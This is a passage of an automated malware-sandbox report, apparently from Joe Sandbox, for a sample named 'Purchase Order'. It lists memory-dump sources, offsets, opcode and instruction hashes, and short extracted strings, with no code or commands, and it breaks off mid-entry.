                                                                            • Instruction ID: 71ff9f1f1ad527e52c22f1dbabbee7826eddf1cc91e02e9a9f3d69b45117da78
                                                                            • Opcode Fuzzy Hash: b512b1fa26ba9275f04c2bae9ba02c61c52d7e93a997cc8a6759c898487d9e74
                                                                            • Instruction Fuzzy Hash: F021D0B1604744EFDB14EF14D984B26BBA5FB84318F24C569D84A8B286C33AD807CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2013209170.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_87d000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                            • Instruction ID: 3df27da437c3c81e4d1148b57db7573cabb574b983e65ee123a1f241c68cfdd7
                                                                            • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                            • Instruction Fuzzy Hash: 4A11DF72404340DFCB02CF00D5C4B16BF71FB94324F24C2A9D8094B65AC33AE85ACBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2013257256.000000000088D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0088D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_88d000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                            • Instruction ID: e8e1df2c2bff65d40e0f961b9aa55fb45bfc3cc203508f0e2c69ffbd80e26316
                                                                            • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                            • Instruction Fuzzy Hash: 7811DD75504780CFDB11DF14D5C4B15FBA2FB84314F24C6AAD8498B696C33AD80BCBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $$ll
                                                                            • API String ID: 0-3155951761
                                                                            • Opcode ID: 1535d2ef235909c575a1eaa12f68ed9ced7f471c49ae90c1fff2041e86b3edfa
                                                                            • Instruction ID: d6291c29f52d2f5573ce6cb953ddfe5ab73eb281e5ab9de0075aa36ba4824b50
                                                                            • Opcode Fuzzy Hash: 1535d2ef235909c575a1eaa12f68ed9ced7f471c49ae90c1fff2041e86b3edfa
                                                                            • Instruction Fuzzy Hash: 55E10874E101598FDB14DFA9C9809AEBBF2FF89304F24C169E418AB355D730A942CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a36587f56eaad4f00eb4ad10fe1c83d71e6c86f734066a479981516adee03b25
                                                                            • Instruction ID: 4cf4e32068b4c02c810fcd7dc86583272a8d6b853f0afa0d20771c7bd60247e9
                                                                            • Opcode Fuzzy Hash: a36587f56eaad4f00eb4ad10fe1c83d71e6c86f734066a479981516adee03b25
                                                                            • Instruction Fuzzy Hash: 6FE10874E001598FDB14DFA9C5809AEBBF2FF89304F249169E458AB355DB30A942CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f065b59becdd250c1327804b9116842ac1cd449393b0b59ea67b30ac1c28058e
                                                                            • Instruction ID: 59d4b01a18f4c019f292a426a47f6cc18901be57e43c3a7ad91069dbd16c1059
                                                                            • Opcode Fuzzy Hash: f065b59becdd250c1327804b9116842ac1cd449393b0b59ea67b30ac1c28058e
                                                                            • Instruction Fuzzy Hash: 0BE1E974E001598FDB14DFA9C9809AEFBF2FF89304F248169E459A7356D730A942CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fa8e722b12c5e84a8e91cd57a882e3583583e40cb034a01d8d20306ce4db4e8d
                                                                            • Instruction ID: d4b68b39998f479eaf237bb0d648dd0145a3813913eafc43e655e5842d178a69
                                                                            • Opcode Fuzzy Hash: fa8e722b12c5e84a8e91cd57a882e3583583e40cb034a01d8d20306ce4db4e8d
                                                                            • Instruction Fuzzy Hash: 63E1F874E001598FDB14DFA9C9809AEFBF2FF89304F248169E459AB355D730A942CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 69ac489614ce80f148594930207a9a39381da3f1adf0c8611e7ce949939357a9
                                                                            • Instruction ID: 7ace68e458d3b150512bace5f43edc21eed9aa86a0fcd45217238932ee76e029
                                                                            • Opcode Fuzzy Hash: 69ac489614ce80f148594930207a9a39381da3f1adf0c8611e7ce949939357a9
                                                                            • Instruction Fuzzy Hash: 9BE10774E002598FDB14DFA9C5809AEFBF2FF89304F249169E458AB315DB31A942CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2013861741.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_c20000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9bdc82f49558b7ce3173446b09c7f43eb64c2d0d407a94a563da9cfe6482304b
                                                                            • Instruction ID: ec6f0065bee25653ca0e454063f174ef0f4db2d78df46ec0031b6212d9a2d821
                                                                            • Opcode Fuzzy Hash: 9bdc82f49558b7ce3173446b09c7f43eb64c2d0d407a94a563da9cfe6482304b
                                                                            • Instruction Fuzzy Hash: 77A16D36E00229CFCF05DFA4D94059EBBB2FF85300B25857EE815AB261DB71E956DB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e32f04bf0767c8afb8bdd7f04be180c7689c8be3129c88b670d4e55a8de79cbc
                                                                            • Instruction ID: 7991f6b45e704abd4c6e5891b09eb647e2d7dc4b93243ae3c88f47d6ef1ff183
                                                                            • Opcode Fuzzy Hash: e32f04bf0767c8afb8bdd7f04be180c7689c8be3129c88b670d4e55a8de79cbc
                                                                            • Instruction Fuzzy Hash: E8510C74E012598BDB14DFAAC5805AEFBF2FF89304F24D16AD458A7315DB30A942CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q$d
                                                                            • API String ID: 0-654554748
                                                                            • Opcode ID: 1f044ddde55e96331737764490fe03d360444c82f078cb6e15bad7741e38bd50
                                                                            • Instruction ID: 47ff6d03d326b26c205b69919c35350891186853bd8fed3a88ee3f471afe07d3
                                                                            • Opcode Fuzzy Hash: 1f044ddde55e96331737764490fe03d360444c82f078cb6e15bad7741e38bd50
                                                                            • Instruction Fuzzy Hash: C681C775E01218DFDB18DFAAD984A9DBBF2BF89300F14C06AE409AB365DB706941CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (o]q$(o]q$(o]q$,aq$,aq
                                                                            • API String ID: 0-615190528
                                                                            • Opcode ID: 46dd17b3d494c3f55dbc964acc5cc214c975b3eb7ab197dd474c73c22da8769d
                                                                            • Instruction ID: 7b1ece14618a6c2bd61ad11818be4707f42522e59d289a930c65e6b89ab092be
                                                                            • Opcode Fuzzy Hash: 46dd17b3d494c3f55dbc964acc5cc214c975b3eb7ab197dd474c73c22da8769d
                                                                            • Instruction Fuzzy Hash: 62026F72A00129DFDB15DF69C984AADBBF6FF8A310F158469E805AB2A1DB70DC41CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                            • API String ID: 0-1229222154
                                                                            • Opcode ID: 3c42ab35b0a92af824a02f73c3fda33b7e47b4157d0db94f9f191654ca2e1046
                                                                            • Instruction ID: 392394d09d527d37e016b1565f7d6e3760f9c4027e7d254aae82334ab57c0d52
                                                                            • Opcode Fuzzy Hash: 3c42ab35b0a92af824a02f73c3fda33b7e47b4157d0db94f9f191654ca2e1046
                                                                            • Instruction Fuzzy Hash: D7E1F975E00229DFDB14DFA9C884A9DBBB2FF49310F158469E919AB3A1DB31E841CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                            • API String ID: 0-1229222154
                                                                            • Opcode ID: db6afaf5d16b60f770e93f5ff88e4b2e04df521bb597afbbb670a951653db418
                                                                            • Instruction ID: afc1f5cadf8f9463e1295f36bb91239e4107653588b217af11c1bebb45412954
                                                                            • Opcode Fuzzy Hash: db6afaf5d16b60f770e93f5ff88e4b2e04df521bb597afbbb670a951653db418
                                                                            • Instruction Fuzzy Hash: A5910875E01218DFDB14DFAAC884A9DBBF2BF89300F24C06AE819AB365DB355941CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                            • API String ID: 0-1229222154
                                                                            • Opcode ID: 1ce023c8d3a7c5dac9e7ef4b91c8c65730c981585bf8c86073a1a6ef75428da5
                                                                            • Instruction ID: 192aa783e87f7f4fd20d1b85ba1b80925b935a20c9ae3e0a399747064b3f74f4
                                                                            • Opcode Fuzzy Hash: 1ce023c8d3a7c5dac9e7ef4b91c8c65730c981585bf8c86073a1a6ef75428da5
                                                                            • Instruction Fuzzy Hash: 4081E775E00218DFDB14DFAAD894A9DBBF2BF89300F14C46AE819AB365DB309941CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                            • API String ID: 0-1229222154
                                                                            • Opcode ID: 0a6c2df96cddd69dd2352b92f433662191ecf28b9884bb6153eb164066009e3c
                                                                            • Instruction ID: 7fb39ec8b0ad3fa13ac3e01fd4b2c7a62528fc4153c16514ec2efe4174b33609
                                                                            • Opcode Fuzzy Hash: 0a6c2df96cddd69dd2352b92f433662191ecf28b9884bb6153eb164066009e3c
                                                                            • Instruction Fuzzy Hash: FA81E775E01218DFDB18DFAAD884A9DBBF2BF89300F14C06AE819AB365DB345941CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                            • API String ID: 0-1229222154
                                                                            • Opcode ID: 69b1578a352a50ad30fd0ac6924bf069ba939a6f84be467b0b2819139170960c
                                                                            • Instruction ID: de0072bed63504aefedbe1d6f5d36b4c4ca11ab97a93d3549304421d84b1d672
                                                                            • Opcode Fuzzy Hash: 69b1578a352a50ad30fd0ac6924bf069ba939a6f84be467b0b2819139170960c
                                                                            • Instruction Fuzzy Hash: E881C874E00218DFDB18DFAAD984A9DBBF2BF89300F14C069E419AB365DB345981CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                            • API String ID: 0-1229222154
                                                                            • Opcode ID: 6f44cfe246c6885374b17dbfb99d7fc41fcda90be653a03ab7db80c3becdc520
                                                                            • Instruction ID: de693185035f9af664be6b5ef6c520eece7765e2b219743df0ad194f44cfa7a3
                                                                            • Opcode Fuzzy Hash: 6f44cfe246c6885374b17dbfb99d7fc41fcda90be653a03ab7db80c3becdc520
                                                                            • Instruction Fuzzy Hash: 7281D775E00218DFDB18DFAAD984A9DBBF2BF89300F14D069E419AB365DB30A941CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0o@p$PH]q$PH]q
                                                                            • API String ID: 0-2023588385
                                                                            • Opcode ID: 85812888bd2bb9954973cca869c3242e1140cb2acad883f90662f31d88bf5608
                                                                            • Instruction ID: fccc2a6967bac29863a9643dae562163fcdde0ae600df97b31ac5f8673cb577a
                                                                            • Opcode Fuzzy Hash: 85812888bd2bb9954973cca869c3242e1140cb2acad883f90662f31d88bf5608
                                                                            • Instruction Fuzzy Hash: AF7107B5E002599FDB18DFAAC984A9DBBF2FF89300F14C06AE804AB365DB345941CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (o]q$4']q
                                                                            • API String ID: 0-176817397
                                                                            • Opcode ID: 06822b19e7e22fcddce0a245a99c1ec6c351c0175c79af88df002f4680ba173b
                                                                            • Instruction ID: 2be831619140678eb219ef4434abfa55ee927684897d363f3e24ac474f83758a
                                                                            • Opcode Fuzzy Hash: 06822b19e7e22fcddce0a245a99c1ec6c351c0175c79af88df002f4680ba173b
                                                                            • Instruction Fuzzy Hash: EE729272A0022ADFCB15CF68C584AAEBBF2FF8A314F158559E9059F3A1D731E941CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (o]q$Haq
                                                                            • API String ID: 0-903699183
                                                                            • Opcode ID: 7f9b764bf58ebdcb9e5456e3e80bfb29ae42155893a229081b97f03948df8853
                                                                            • Instruction ID: f15806393dad8f09595632ba830cfc12bad04863673206c4f038ae2bbfa7c9a0
                                                                            • Opcode Fuzzy Hash: 7f9b764bf58ebdcb9e5456e3e80bfb29ae42155893a229081b97f03948df8853
                                                                            • Instruction Fuzzy Hash: 0012AD71B002199FDB18DF69C894AAEBBF6BF89300F148569E905DB395EB30DC41CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: PH]q$PH]q
                                                                            • API String ID: 0-1166926398
                                                                            • Opcode ID: 5d01dec8c8759d3f1bb8f34013b5658719bd61d8042e7d4b48dd1fc2db58e875
                                                                            • Instruction ID: 4a9614abd91cb4dab881f4d2aff90d6cca1e1afe5b21e2b47d9d1f48495815cb
                                                                            • Opcode Fuzzy Hash: 5d01dec8c8759d3f1bb8f34013b5658719bd61d8042e7d4b48dd1fc2db58e875
                                                                            • Instruction Fuzzy Hash: 5E81DE74E01218CFDB58CFAAD9947AEBBF2BF89310F20816AD419AB354DB345985CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fd051d63798cb77370f6990a31a18174fd537d37cad680fc9c8bd437b45bedc8
                                                                            • Instruction ID: e4129f75b82853c0fc63f02d0e2e101eea8e23bac60d84b92b20225a4c40fa3a
                                                                            • Opcode Fuzzy Hash: fd051d63798cb77370f6990a31a18174fd537d37cad680fc9c8bd437b45bedc8
                                                                            • Instruction Fuzzy Hash: 6B828E74E012299FDB64DF69C894BDDBBB2BF89300F1481EAA40DA7264DB315E81CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0e284bd401d05b08b605660e5aa85a3c4d97b60d2120a29a0cae312755aca085
                                                                            • Instruction ID: 104a24f95a6cb37f21b3d83670dc8d79c4f2801bc328e20cd1dfcde52c2b79a8
                                                                            • Opcode Fuzzy Hash: 0e284bd401d05b08b605660e5aa85a3c4d97b60d2120a29a0cae312755aca085
                                                                            • Instruction Fuzzy Hash: FD72D075E012298FDB64DF69D890BDDBBB2BB4A300F1481EAD409AB395D7309E81CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 183be6909e9fb4650a570e2716849da0cb0ac143560c5b9660cf25915dc6dbc3
                                                                            • Instruction ID: fc87676ae99cd26cecfdf88ca98899969cfe87ce2eba93deca6653061e28f46d
                                                                            • Opcode Fuzzy Hash: 183be6909e9fb4650a570e2716849da0cb0ac143560c5b9660cf25915dc6dbc3
                                                                            • Instruction Fuzzy Hash: 56E1B374E01219CFDB64DFA5C994B9DBBB2BF89304F2081AAD408AB394DB355A85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4a500579a8554d59afb506368d2b06ea989286c408a663c4d2003d251b70b3a1
                                                                            • Instruction ID: 17f10fadd6f78edbefbf78e4229010ad0da0f48289f0fb8a10bfd050743a3b30
                                                                            • Opcode Fuzzy Hash: 4a500579a8554d59afb506368d2b06ea989286c408a663c4d2003d251b70b3a1
                                                                            • Instruction Fuzzy Hash: F1D1B074E01219CFDB54DFA5D994B9DBBB2FF89300F2080AAD809AB365DB345A85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 88db4be9a51b95008341758c65f89699920660d5b50cc043fc4f502c78741440
                                                                            • Instruction ID: 75caf95a11b7440ae9f9b53c676a37a14995286f47921d8237503e1d88cdd677
                                                                            • Opcode Fuzzy Hash: 88db4be9a51b95008341758c65f89699920660d5b50cc043fc4f502c78741440
                                                                            • Instruction Fuzzy Hash: D7C1B074E01219CFDB54DFA5C994B9DBBB2FF89300F2081AAD809AB364DB355A85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9777d9a0a87227d7ee8f90abbccf8627167609e0b657cab7467f389c6caa7af3
                                                                            • Instruction ID: 8dc5655fee62d0bead7cbd657b80e36467a094dfcba4cc5f96347b5b34dd5914
                                                                            • Opcode Fuzzy Hash: 9777d9a0a87227d7ee8f90abbccf8627167609e0b657cab7467f389c6caa7af3
                                                                            • Instruction Fuzzy Hash: 04A19E74E012288FEB68DF6AC945B9DFBF2AF89310F14C0AAD40DA7254DB705A85CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8f0bfc619a03de2d62c4629e743821ee97b0a17780755bcade95f01ff5678c27
                                                                            • Instruction ID: 2b8eb1d4cc161a98af676017baac1a93d69eb139049c4637bed47e50e64708ca
                                                                            • Opcode Fuzzy Hash: 8f0bfc619a03de2d62c4629e743821ee97b0a17780755bcade95f01ff5678c27
                                                                            • Instruction Fuzzy Hash: BBA1AF74E012288FEB68DF6AC944B9DBBF2BF89310F14D0AAD40DA7254DB705A85CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b52ff9b05783d831376dae848ced8c5bf92286a2bebc3f8616cee5deeacab92e
                                                                            • Instruction ID: ed34d15816bf8861dc75d188e679badf7bc25cd861ee9c1a7428e8516b858b82
                                                                            • Opcode Fuzzy Hash: b52ff9b05783d831376dae848ced8c5bf92286a2bebc3f8616cee5deeacab92e
                                                                            • Instruction Fuzzy Hash: 5BA19375E012288FEB64CF6AC944B9DBBF2AF89310F14C0AAD40DA7254DB745A85CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3d91d3d40031608be9e6bff42cbbcfad709a32130dbc0a0f298ee4d54f149b48
                                                                            • Instruction ID: 422d2f4b65ac465af923e99e6476a17024243f862c1f3955ecc1efbd0dce4a0c
                                                                            • Opcode Fuzzy Hash: 3d91d3d40031608be9e6bff42cbbcfad709a32130dbc0a0f298ee4d54f149b48
                                                                            • Instruction Fuzzy Hash: 0EA1A075E016288FEB68CF6AC944B9DBBF2BF89310F14C0AAD40DA7254DB345A85CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fd7bc663ed3d9a02affe0db56686f041526aa8abbc16a4ce498ec1d3204dcb35
                                                                            • Instruction ID: 12474305874d1dca9691817c11c3ea495261b50026968dacedc48d04850abcef
                                                                            • Opcode Fuzzy Hash: fd7bc663ed3d9a02affe0db56686f041526aa8abbc16a4ce498ec1d3204dcb35
